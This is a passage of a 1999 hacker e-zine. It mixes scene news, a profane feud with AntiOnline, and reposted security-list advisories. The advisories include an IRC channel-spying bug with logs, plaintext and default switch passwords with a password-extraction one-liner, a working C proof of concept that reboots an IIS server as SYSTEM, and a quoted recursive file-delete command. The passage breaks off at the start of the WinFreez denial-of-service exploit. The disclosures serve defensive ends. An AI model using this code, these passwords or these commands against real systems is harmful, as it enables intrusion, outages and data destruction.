Service attacks on our server, the spams and the threats made me so sick that I removed it. I wont provide a service for a scene which is being dominated by little kids." Net Security will think about setting up a new webboard, but we arent sure about this yet. As a side note, we've set up a 'webboard' that is published by the beseen company and it has seen no action as of yet, you might want to check it out and we can see how well it works (or doesn't as the case may be.) - Ed @HWA 03.0 AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Innerpulse.com... AntiOnline.com Threatens Legal Action Contributed by siko Thursday - March 04, 1999. 05:52PM GMT Following a rash of insults at AntiOnline.com, Founder John Vransisomething has threatened legal action against Innerpulse.com. Innerpulse has this statement for Mister AntiOnline: Talk your shit, grab your gat, call your click. But do not ever threaten Innerpulse with legal action unless you want some keys dropped.If you ain't ever been to the ghetto, you wouldn't understand the ghetto. You stay the fuck out of the ghetto. Don't try to tell me using the term 'antionline.com' is a violation of copyright laws. Its a fucking domain name. As for why we throw shit all over you name, this is a very good example of why. He went so far as to say the letter he sent me could not be reproduced without express written permission. Fuck that. You can surf on over to Innerpulse but thats all, just surf on by. It would be the biggest bitch move in Internet history to launch a legal suit at opposition just because your feelings are hurt. Stop trying to be the Microsoft of the underground community. Nothing will be removed. Nothing will be discontinued. And I don't care if someone was stupid enough to invest 60 billion in you. Why don't you go to antihell.com. Punk ass. Yeah, I posted it, What's Up Now Monkey? http://innerpulse.com/jp.txt (The text from the above link appears in its entirety below - Ed) "
aka Siko:
       I am sending you this letter to officially request that the content that
       relates to AntiOnline currently posted at the following URL be removed
       promptly: http://www.innerpulse.com/

       By references in your pages, I am sure that you are aware that
       "AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold
       rights to.  The language used on your page is not only inflammatory, it is
       flat out libelous. That content, combined with references to "AntiOnline"
       is what has led me to write this letter.

       While comedic parody is a protected first amendment right, knowingly
       printing false, libelous information about a company, in the context of it
       being news, so that others may believe it to be fact, is not.  We have
       received several e-mails from individuals questioning whether some of the
       information posted on your page, is factual news, or fictional writing.

       Also, the re-print of trademarks which are the property of another
       company, without written authorization, do not fall under first amendment
       rights.

       By sending you this letter, I am hoping that we can settle this matter
       without me being forced to seek a legal remedy. However, if you are not
       willing to cooperate with my requests, I may very well be forced into
       finding legal recourses, which may include a civil lawsuit.  You will
       receive
       no further communications from me directly.  If the content is not removed
       within 24 hours, this matter will be handed over to my legal council.
       Legal action may be filed shortly there after to recover damages done to
       AntiOnline's trade and reputation.

       A copy of this letter has been sent "blind carbon" to several third party
       individuals, so that it may be established that I have given you
       opportunity to remove the content voluntarily.

       If you have any questions regarding my request, you may contact me via an
       e-mail to jp@antionline.com or by phone at (724)773-0940.

       I would like to thank you in advance for what I hope will be a prompt
       response to my requests.

       Very Truly Yours,
       Mr. John Vranesevich
      General Partner, AntiOnline

      --------------------------------------------------------------------------------
      This letter is copyright 1999, AntiOnline LLP
      Reprint without written authorization is strictly prohibited...
      
" Our Reply to JayPee http://innerpulse.com/jp-reply.txt Hi, After I saw the e-mail you sent to siko I wanted to give you my idea on this issue, as I provide web hosting for Innerpulse.com and occasionally work on the website. Response below. > aka Siko: > > I am sending you this letter to officially request that the content that > relates to AntiOnline currently posted at the following URL be removed > promptly: http://www.innerpulse.com/ If you want to send an official letter, you don't use e-mail. You can redirect official letters to our main administrative NOC at: [CubeSoft Communications] Cp2, Rr2, H.a.m Magdalen Islands, QC G0B 1K0 CANADA > By references in your pages, I am sure that you are aware that > "AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold > rights to. The language used on your page is not only inflammatory, it is > flat out libelous. That content, combined with references to "AntiOnline" > is what has led me to write this letter. First of all, I think you should be consulting a lawyer about this. I did, and I can tell you that mentionning the name "AntiOnline" in a news article is not libelous; as we never even put a link to your website (which would have not been legally wrong either). Is mentionning "Microsoft" in a news article libelous? I don't think so. > While comedic parody is a protected first amendment right, knowingly > printing false, libelous information about a company, in the context of it > being news, so that others may believe it to be fact, is not. We have > received several e-mails from individuals questioning whether some of the > information posted on your page, is factual news, or fictional writing. We don't want to take responsibility of the stupidity of your website's visitors. Tell them to redirect their comments and question to contact@innerpulse.com. My personal opinion is that it is quite obvious whether an article is true or not; Innerpulse adds a touch of humor to it, that's what makes Innerpulse different. > Also, the re-print of trademarks which are the property of another > company, without written authorization, do not fall under first amendment > rights. Ahh I'm beginning to think you are referring to `AntiOnline-O-Rama' from the INN features section. Do you seriously think I would have wasted my time recopying AntiOnline's frontpage entirely? This may be not in the scope of your technical skills, but that is actually a link to a CGI script which simply acts as a proxy - it prints information directly from AntiOnline.com, doing some word search/replaces in the process. By changing the parameter you can do the same with any other website. > By sending you this letter, I am hoping that we can settle this matter > without me being forced to seek a legal remedy. However, if you are not > willing to cooperate with my requests, I may very well be forced into > finding legal recourses, which may include a civil lawsuit. You will > receive > no further communications from me directly. If the content is not removed > within 24 hours, this matter will be handed over to my legal council. > Legal action may be filed shortly there after to recover damages done to > AntiOnline's trade and reputation. I've been in that situation before, just an advice: don't even think about this, this will pass as a violation of free speech. And by the way, who do you want to sue exactly? > A copy of this letter has been sent "blind carbon" to several third party > individuals, so that it may be established that I have given you > opportunity to remove the content voluntarily. I don't think so, John. > If you have any questions regarding my request, you may contact me via an > e-mail to jp@antionline.com or by phone at (724)773-0940. > > I would like to thank you in advance for what I hope will be a prompt > response to my requests. > > Very Truly Yours, > Mr. John Vranesevich > General Partner, AntiOnline @HWA 03.1 The FPSC-IRCD.txt advisory. ~~~~~~~~~~~~~~~~~~~~~~~~~~~ The FPSC-IRCD.txt advisory. --------------------------- By: syg of the FPSC @3/7/98 ircd@FPSC.hemp.net http://FPSC.hemp.net Program affected: IRCD Versions affected: All hybrid and other EFnet IRCD versions. Probably others. Problem: According to the date of this file, thier is a few bugs in hybrid IRCD and maybe others. I've checked DALnet's source and it seems thiers is fixed and not affected. The bug is in match.c of the source code and starts on line 204 at 'tolowertab[]'. Note the line that consists of the following: "'t', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~',". Then go to line 238 in match.c to 'touppertab[]'. Note the line that reads: "'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^'," and look at the two lines. If you notice, it takes the '{' char and defines its uppercase char as '[' as along with defining '|' to '\', '}' to ']', and '~' to '^'. What this means is thier the same characters in channel names and nicknames. Now what can you do with this in such a way it would be a problem? You can spy on channels that consist of any one of those 8 characters below: 1) { --Defined as LowerCase [ 2) [ --Defined as UpperCase { 3) } --Defined as LowerCase ] 4) ] --Defined as UpperCase } 5) | --Defined as LowerCase \ 6) \ --Defined as UpperCase | 7) ~ --Defined as LowerCase ^ 8) ^ --Defined as UpperCase ~ This problem and mIRC make a dangerous combination. Lets say a bunch of your friends hang in #mIRC] and you run BitchX. All you have to do is join #mIRC} and thier mIRC clients wont see you join the channel which means you are a ghost and therefore are invisible. Another example would be... two people are in #Love^2 and you ran BitchX. All you would have to do is join #Love~2 and they wont see you join, therefore you can spy on thier conversation all night long. Now if one of the mIRC people happened to type "/names #mIRC]" or "/names #Love^2" you would magically pop up in the nick list of the channel. That is also the same if someone joins the channel after you have joined, you will show up in thier names list therefore it will put you in thier nick list in the channel window. Be creative and have fun. Logs: The "->->->" is me telling you whats going on. ->->-> In mIRC I typed /join #[ with the nick mIRC-1 *** Now talking in #[ ->->-> No one is in the channel but me in the nick list. ->->-> Then I looked in my status window and got the join info. #[ @mIRC-1 #[ End of /NAMES list. #[ created on Thu Feb 25 14:13:45 ->->-> Then in another mIRC client I typed /join #{ with the nick mIRC-2 *** Now talking in #{ ->->-> No one is in the channel but me in the nick list. ->->-> Then I looked in my status window and got the join info. #[ mIRC-2 @mIRC-1 #{ End of /NAMES list. #[ + #[ created on Thu Feb 25 14:13:45 ->->-> NOTE: I can't see mIRC-1 in the nick list in the channel. ->->-> I also can't see mIRC-2 in mIRC-1's nick list. ->->-> So basically it's like two different channels when you are in mIRC. ->->-> Let's now bring bitchX into play... ->->-> In BitchX under the nick BitchX-1 i typed /join #[ BitchX-1 [test@FPSC.hemp.net] has joined #[ [Users(#[:3)] [ BitchX-1 ] [ mIRC-2 ] [@mIRC-1 ] Channel #[ was created at Thu Feb 25 14:13:45 1999 BitchX: Join to #[ was synced in 0.391 secs! ->->-> Now under mIRC-1's client I saw... *** BitchX-1 (test@FPSC.hemp.net) has joined #[ ->->-> Which I should have because we are both in #[ ->->-> But on the other hand, under mIRC-2's client( The one in #{ )... ->->-> I didn't see BitchX-1 join. ->->-> And as you can see, BitchX-1 see's mIRC-2 in the channel #[ ->->-> Now let me type with all three of them. ->->-> Under all three clients I will type thier nick and chan to the channel. ->->-> Under BitchX-1's client I saw all three clients talk... mIRC-1 #[ mIRC-2 #{ BitchX-1 #[ ->->-> Under mIRC-1's client I saw myself and BitchX-1 type (We are both in #[) mIRC-1 #[ BitchX-1 #[ ->->-> Under mIRC-2's client I saw myself type only ( Im in #{ ) mIRC-2 #{ ->->-> As you can see mIRC-2 is being spy'd on by the BitchX client. ->->-> End of logs. Sollution: The fix would be to simply edit /src/match.c of the source code. DALnet seems to have a nice match.c at ftp.dal.net in df467.tgz if you EFnet staff need any ideas. We all hope to see this fixed in your next release of hybrid. Final Notes: IRCD coders and staff members of all networks and all IRCD versions need to check your source for this bug and fix it before it gets abused... maybe it was you in #^locals^ giving your phone number out to a friend which was being spy'd on by another local enemy. Other than that, everyone keep up the good work and so long. Also, thanks to sate for helping me test this out. Questions/jobs/info/etc: ircd@FPSC.hemp.net -syg @HWA 04.0 Pentagon under attack ~~~~~~~~~~~~~~~~~~~~~ March 7th, 1999 From http://www.hackernews.com/ Pentagon investigates Russian cyberattacks contributed to HNN by Bronc A probe has been launched into recent efforts of crackers attempting to access Pentagon computer systems. Pentagon officials are unsure if this is a coordinated attack or the work of separate individuals. Early indications show that many of the attacks have originated in Russia and may have had the assistance of a insider. No classified networks have yet been breached. U.S. Deputy Defense Secretary John Hamre has been quoted as saying "It is a major concern." (Ed Note: This is the same John Hamre who last year was quoted as saying "This is the most coordinated attack we have seen to date" when referring to attacks on government systems by three teenagers.) Follow up here: http://abcnews.go.com/sections/world/DailyNews/pentagonrussia990304.html http://www.techserver.com/story/body/0,1634,24763-40126-294330-0,00.html http://www.msnbc.com/news/246801.asp http://www.smh.com.au/news/9903/05/breaking2/news1.html And from Innerpulse.com; www.innerpulse.com United States: Cyberwar? Contributed to Innerpulse by siko Sunday - March 07, 1999. 06:10PM GMT Innerpulse has decided not to join the media inflated 'Cyberwar' reporting until today. We have been doing extensive research and have discovered some exclusive details. We all know the so called 'facts'. Coordinated attacks on certain servers have officials at the Pentagon looking for answers, and quickly. What certain people forget, is that the man who said this is the most organized attack to date, is also the man that said a 16 year old kid named 'Makeveli' had also launched an extremely organized attack on government servers. For those who aren't into the urban musical subculture, Makeveli most likely came from the popular rapper, Tupac's influence. They have stated the attacks are coming from Canada and Thailand amongst others. Yet they can not trace any further. Sorry, if you can tell the country than you have the IP, and the ability to find the source. The United States is not at Cyberwar with anyone but the media, who took a couple of failed hack attempts and turned it into World War III. Innerpulse has conducted various interviews and can now finger the source of this terror. His name is John Vranesevich, which traces back to packetz.antionline.com. In an effort to get more publicity for breaking a story, he blew up a situation leading many respected news outlets into believeing this was actually as blown out of proportion as he made it sound. And on top of that, they pick Hamre, the man who called an Undernet hacker named 'Makeveli', a serious threat the the United States National Security. The Pentagon may be experiencing more attacks lately. This is not blown out of proportion. But if you take a moment to question the motives of people who would attempt to crack into a government server.. Perhaps because it gains you recognition and fame as it has done for so many in the past? This is the same reason antionline.com gets lots of crack attempts every day, because almost everyone in the 'hacker' community wants to be known for breaking the site that sold out. The United States is not currently involved in a Cyber War, never has been, and most likely will not be in any of our reader's lifetimes. But, if someone really cracks a Pentagon server and fires a missile at me, boy won't I feel silly. And a fairly intelligent article with little FUD from ABC news... http://www.abcnews.go.com/sections/tech/DailyNews/pentahack990309.html Pentagon Attacks Overblown? Hackers Complain Government Computers Over-Sensitive By Michael J. Martinez ABCNEWS.com March 9 Last week, the Pentagon reported that over the last several months its computer systems have withstood an unprecedented and concerted series of external attacks. U.S.-based hackers might simulate an attack from abroad by routing their signals through a series of far-flung servers. (ABCNEWS.com) Deputy Defense Secretary John Hamre confirmed the attacks, calling them a major concern. Pentagon officials stated that the electronic infiltrations have come from abroad most likely Russia. To Pentagon watchers, and to members of the loosely knit hacker fraternity in the United States, those claims sounded familiar. Terrorists or Teens? Last February, Hamre announced that the Pentagon was undergoing the most intense, coordinated cyberattack it had ever seen. Over a two-week period, unknown hackers launched coordinated attacks against hundreds of military domains and servers. After weeks of investigation, the culprits were nabbed. They turned out to be an 18-year-old Israeli computer enthusiast with a lot of time on his hands, and two teenagers from California who were using readily available software tools downloaded from the Internet to discredit the Pentagon’s computer security. No hackers claimed credit for the latest assaults; there was no bragging in IRC chat rooms or on Web pages, as typically happens after well-publicized computer attacks on government systems. That could mean a number of different things, says Dr. Peter Tippett, president of ISCA, Inc., a computer security firm. The attacks aren’t that bad, the person doing it doesn’t want to take credit, or the attacks are coming from overseas. The latest assaults could have come from foreign governments, terrorist organizations or from the proverbial mischievous teenager. Recon vs. Frontal Assault What exactly constitutes an attack? Hackers customarily scan remote computer systems, looking for security holes through which to send or retrieve data. Tools for such scans are readily available for downloading from the Internet. These scanners basically take known holes and hit a server, one after another, asking it if these holes are open, says an independent hacker known as Bronc Buster. They may or may not be there, but as far as logs on systems will show, unless you are an experienced admin and can tell the difference, you are being attacked. The Pentagon, however, does not differentiate between scans, which is essentially cyberspace reconnaissance, and full attacks, when a malicious system cracker actively attempts to break through security. Tippett points out that scans are useful for later attack, and that determined hackers have found ways to conduct scans without setting off alarms. Most servers have thousands of accounts, and thus thousands of entry points. If a hacker takes his time, and only pings a few entry points every so often, he can usually avoid notice. In recent congressional testimony, Hamre said Defense Department computers are attacked upwards of 60 times per week, with about 10 such attacks requiring additional investigation. He did not differentiate between scans or infiltration attempts. From Russia With Love The theory that the recent attacks came from Russia is also questionable. When it comes to the Internet, geography quickly becomes irrelevant. Hacking tools, some of which are readily available online, could allow a would-be hacker to fake his own locale information, or channel his attack through servers all around the world. I don’t know how the Pentagon would know where the attacks come from, Tippett says. If you have access to enough servers, it’s relatively easy to re-route your connection to make it appear you’re in Russia, when you could just be down the street. Rep. Curt Weldon, R-Pa., who chairs the subcommittee of the House Armed Services Committee where Hamre testified, acknowledges that the starting point of the recent computer assaults still in doubt. But he contends the new attacks represent a new kind of warfare, in which less powerful nations could gain an edge against the United States by hacking into and knocking out key computer systems. This appears to be a coordinated effort to break into our computer system, and we not giving the problem the kind of visibility it needs, Weldon says. This Y2K thing is a piece of cake compare to this. OXBlood Ruffin, foreign minister for the hacker group Cult of the Dead Cow, has another view. It smells like someone is looking for increased budgets, Ruffin wrote in an e-mail, calling Hamre’s alarms a typical crying game from the military. ‘Hacking’ Into a Government Computer According to a Philadelphia-based hacker who calls himself El Diablo, government computers are far too quick to register an attack. El Diablo, affiliated with the HologramNation hacker group, should know: he accessed the White House Web server. Instead of using a a Web browser, El Diablo accessed the whitehouse.gov host address via Telnet. Telnet is a common way for a user to log directly into a server, accessing the server’s systems remotely. Once dialed in, El Diablo encountered the following warning: You are about to access a U.S. Government computer system. Access to this system is restricted to authorized users only. Anyone who accesses this system without authorization, or exceeds authorized access, could be subject to a fine or imprisonment, or both, under Public Law 98-473. The message went on to say that the user was being monitored. The computer then asked for a username and password, at which point El Diablo exited. What this seems to say is that I just ‘hacked’ into the government computers, he says. The hackers [accessing Pentagon computers] could have simply done that, and the government could have blown this waaaaaay out of proportion. Many people Telnet into their work computers it’s not some obscure hacker tool. Yet the White House says what El Diablo did is a potential attack. I’m sure lots of people Telnet into that server, either to just have a look, or they access it by mistake, and that’s OK, said White House spokesman Mark Kitchens. But that is still considered an attempt at breaching security. @HWA 04.1 Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 5 Mar 1999 12:19:59 -0800 From: JEK To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Cheyenne InocuLAN for Exchange plain text password still there This dates back to Ron Watkins' post on 12/16/98 regarding the plain text account name/password left in the exchverify.log file by the installation of Cheyenne's Anti-Virus Agent for Exchange. Quote from Ron: "I was called on Monday by Brian Linton at Computer Associates. He says that the plaintext admin password was put into c:\exchverify.log by earlier versions of the Arcserve Exchange client, but that build 57 (the most recent version) puts only the length there. It does not erase that file as new installs are done, but rather appends, which is why some folks still had that plaintext password even after installing the most recent build." I am currently testing AV Agent for Exchange and installed what I was told was the most recent version (build 64) on a clean NT 4.0/SP4/Exchange 5.5 server running InocuLAN for NT 4.0 (build 375). This was a fresh build and *not* upgraded from earlier versions of any software. The exchverify.log file is still there and still contains the account name and password in clear text - NOT merely the length as stated above. JEK, MCSE @HWA 04.2 Default passwords in Bay networks switches ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 10 Mar 1999 14:48:58 -0800 From: Jan B. Koum To: BUGTRAQ@netspace.org Subject: Default password in Bay Networks switches. Ok.. so you would think after 3Com $%#& up last year of inserting default password into firmware vendors would learn their lesson? [See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant] Hah! Welcome to the world of strings and Bay Networks firmware files. I have looked at some bay networks switches and see that the following have default password of "NetICs" BayStack 350T HW:RevC FW:V1.01 SW:V1.2.0.10 BayStack 350T HW:RevC FW:V1.01 SW:V2.0.0.15 These however I was not able to find defaults for: BayStack 350-24T HW:RevA FW:V1.04 SW:V1.0.0.2 Bay Networks BayStack 303 Ethernet Switch BayStack 28115/ADV Fast Ethernet Switch If you have firmware images for the above, just % strings *.img | grep -B5 "Invalid Password" Something similar to this command might give you the passwd. Of course I don't have to tell you about how bad it is when someone can control your network infrastructure (switches). I don't have much experience with Bay hardware (in fact, I have none - someone at work just asked me to help them get into a switch for which they forgot the password). If someone can shed some light on this topic, it would be great. And yes, I consider this to be a backdoor - wouldn't you call it a backdoor if Solaris had default password for root logins? How can vendors in 1999 even THINK about something as stupid as inserting a default password like this into a switch!?!? Granted - I am almost sure Bay didn't have evil intentions for the use .. but still. I am speechless. -- Yan P.S. - Greetz to the inhabitants of #!adm and #!w00w00 ------------------------------------------------------------------------------ Date: Wed, 10 Mar 1999 17:06:05 -0700 From: Dax Kelson To: BUGTRAQ@netspace.org Subject: Re: Default password in Bay Networks switches. On Wed, 10 Mar 1999, Jan B. Koum wrote: > Ok.. so you would think after 3Com $%#& up last year of inserting > default password into firmware vendors would learn their lesson? > [See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant] > > Hah! Welcome to the world of strings and Bay Networks firmware > files. I have looked at some bay networks switches and see that > the following have default password of "NetICs" The Bay Networks case number for this bug/oversight is: 990310-614 Normally "backdoor" passwords on Bay gear only work through the console. Dax Kelson Internet Connect, Inc. ------------------------------------------------------------------------------ Date: Wed, 10 Mar 1999 17:16:53 -0800 From: Jon Green To: BUGTRAQ@netspace.org Subject: Re: Default password in Bay Networks switches. > And yes, I consider this to be a backdoor - wouldn't you call it > a backdoor if Solaris had default password for root logins? > How can vendors in 1999 even THINK about something as stupid as > inserting a default password like this into a switch!?!? > Granted - I am almost sure Bay didn't have evil intentions for > the use .. but still. I am speechless. This was fixed in version 2.0.3.4 of the BS350 code last November. The backdoor is still there for console access, but not for telnet. This problem only affected the Baystack 350T and 350F, it did not affect the 350-24T or 450. Also, note that the 350 has always had the ability to limit telnet logins to certain source addresses; it is recommended that that feature be used. Software upgrades for the 350 can be found at http://support.baynetworks.com under Software. If you don't have a support contract, call (800) 2LANWAN. -Jon ------------------------------------------------------------------- Jon Green 4301 Great America Pkwy Senior Competitive Test Engineer Santa Clara, CA 95054 Nortel Networks (408) 495-2618 Voice jogreen@nortelnetworks.com (408) 495-4540 Fax ------------------------------------------------------------------- @HWA 04.3 ISAPI Exploit code ~~~~~~~~~~~~~~~~~~ Date: Tue, 9 Mar 1999 10:54:47 -0500 From: Fabien Royer To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM > -----Original Message----- > From: Patrick CHAMBET [mailto:pchambet@club-internet.fr] > Sent: Tuesday, March 09, 1999 5:27 AM > To: Fabien Royer > Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: Re: ISAPI Extension vulnerability allows to execute code as > SYSTEM > > > Any proof ? Any sample ? Any work around ? > How can we test our servers ? Using VC++, create an ISAPI extension project and call it CRbExtension. Replace GetExtensionVersion() and Default() with the code below. Compile it to something simple, like rb.dll. Place it on your web server and invoke it from your browser like this http://your.machine.name/scripts/rb.dll? Note: if you are using IE4.0, don't call this from the machine that is running the web server otherwise, the next time you log in, IE will recall the last URL and you'll reboot again. The workaround is to NEVER give users (or customers) the ability to use ISAPI extensions if you allow them to upload CGIs to customize their home page. An .exe on the other hand is much safer (is coded correctly). Fabien. BOOL CRbExtension::GetExtensionVersion(HSE_VERSION_INFO* pVer) { HANDLE hToken; // handle to process token TOKEN_PRIVILEGES tkp; // pointer to token structure // Get the current process token handle so we can get shutdown // privilege. OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken); // Get the LUID for shutdown privilege. LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; // one privilege to set tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // Get shutdown privilege for this process. AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0); ExitWindowsEx(EWX_REBOOT,0); // Disable shutdown privilege. tkp.Privileges[0].Attributes = 0; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0); // Call default implementation for initialization CHttpServer::GetExtensionVersion(pVer); // Load description string TCHAR sz[HSE_MAX_EXT_DLL_NAME_LEN+1]; ISAPIVERIFY(::LoadString(AfxGetResourceHandle(),IDS_SERVER, sz,HSE_MAX_EXT_DLL_NAME_LEN)); _tcscpy(pVer->lpszExtensionDesc, sz); return TRUE; } void CRbExtension::Default(CHttpServerContext* pCtxt) { StartContent(pCtxt); WriteTitle(pCtxt); *pCtxt << _T("Reboot
"); EndContent(pCtxt); } > > Patrick Chambet > IBM Global Services > > > >There's a vulnerability in IIS (and other WEB servers executing > as SYSTEM) > >that allows to execute an ISAPI extension in the security context of the > >server itself instead of the security context of IUSR_WHATEVER. > How is this > >possible: when the server loads an ISAPI extension the first > time, it calls > >GetExtensionVersion(). During the call to this function, an attacker can > >execute any code as SYSTEM. This is a problem if you're an ISP doing > hosting > >with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. > ) because > >any user allowed to place a "CGI" on the server can take over. Of course, > >this problem is not limited to ISPs. > >Fabien. -=- Prior Discussion & further details ; Date: Mon, 8 Mar 1999 11:27:48 -0500 From: Fabien Royer To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM There's a vulnerability in IIS (and other WEB servers executing as SYSTEM) that allows to execute an ISAPI extension in the security context of the server itself instead of the security context of IUSR_WHATEVER. How is this possible: when the server loads an ISAPI extension the first time, it calls GetExtensionVersion(). During the call to this function, an attacker can execute any code as SYSTEM. This is a problem if you're an ISP doing hosting with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because any user allowed to place a "CGI" on the server can take over. Of course, this problem is not limited to ISPs. Fabien. -------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 00:32:03 -0500 From: Fabien Royer To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM > -----Original Message----- > From: Scott L. Krabler [mailto:scottk@visi.com] > Sent: Monday, March 08, 1999 11:41 PM > To: Fabien Royer; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: RE: ISAPI Extension vulnerability allows to execute code as > SYSTEM > > > By this, I'm assuming the required safeguard would be to only implement > ISAPI filters whose contents are known. Since ISAPI filters can only be Typically, filters and extensions fulfill different purposes. For instance, you would not implement an complete WEB based application as a filter for performance reasons. Filters see all http "traffic" while extensions only see the http traffic that is directed to them. Unless you have written the filter yourself (or someone trusted in your organization), you can't know if a filter is 100% secure either. > installed locally(?) there shouldn't be any general risk. Yes? This is not that simple. You can remotely install a filter under IIS if you can cause the following sequence of events to occur: 1) Place the filter .dll in a location accessible from the web server. 2) Update the registry to register the new filter. 3) Cause a reboot of the machine or stop/start IIS. All of this can be done from the GetExtensionVersion() call mentioned earlier. Finally, you can host a filter *AND* an extension in the same .dll. Fabien. > > -----Original Message----- > From: Windows NT BugTraq Mailing List > [mailto:NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM]On Behalf Of Fabien Royer > Sent: Monday, March 08, 1999 10:28 AM > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM > > > There's a vulnerability in IIS (and other WEB servers executing as SYSTEM) > that allows to execute an ISAPI extension in the security context of the > server itself instead of the security context of IUSR_WHATEVER. > How is this > possible: when the server loads an ISAPI extension the first > time, it calls > GetExtensionVersion(). During the call to this function, an attacker can > execute any code as SYSTEM. This is a problem if you're an ISP > doing hosting > with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because > any user allowed to place a "CGI" on the server can take over. Of course, > this problem is not limited to ISPs. > Fabien. > -------------------------------------------------------------------------------- Date: Wed, 10 Mar 1999 18:28:24 -0500 From: Fabien Royer To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM Sure, however the executable that you are going to execute will run in a separate address space and if it is spawned by IIS, it will run in the security context of IUSR_xxx instead of SYSTEM. This is the *major* difference between what you can do with the .dll approach and the .exe approach. Fabien. > I don't know that .EXE's are that much safer. How about this: > > I upload 4nt.exe (Command.Com/CMD.Exe replacement program) > I write an EXE that calls it and runs the command 'reboot' > or even a 'del /zsx c:\*.*' (Which will recursively delete all > files that aren't currently in use) > > Same idea ... different way about it. > > Being a developer and having the tools available, I require that > I get to compile the code myself. That way, I can scan through > the code to see if it's trying to do anything malicious. > Granted, this isn't 100% foolproof, but it does help! > > Charlie @HWA 04.4 Winfreez.c new exploit code for win9x and NT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The full original source code is followed by a Solaris version and further discussion, from Packetstorm/Bugtraq. (March 11th 1999) http://www.genocide2600.com/~tattooman/new.shtml#latest /* WinFreez.c by Delmore ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box in LAN. Usage: winfreez sendtoip sendfromip time where is victim host, is router for victim host,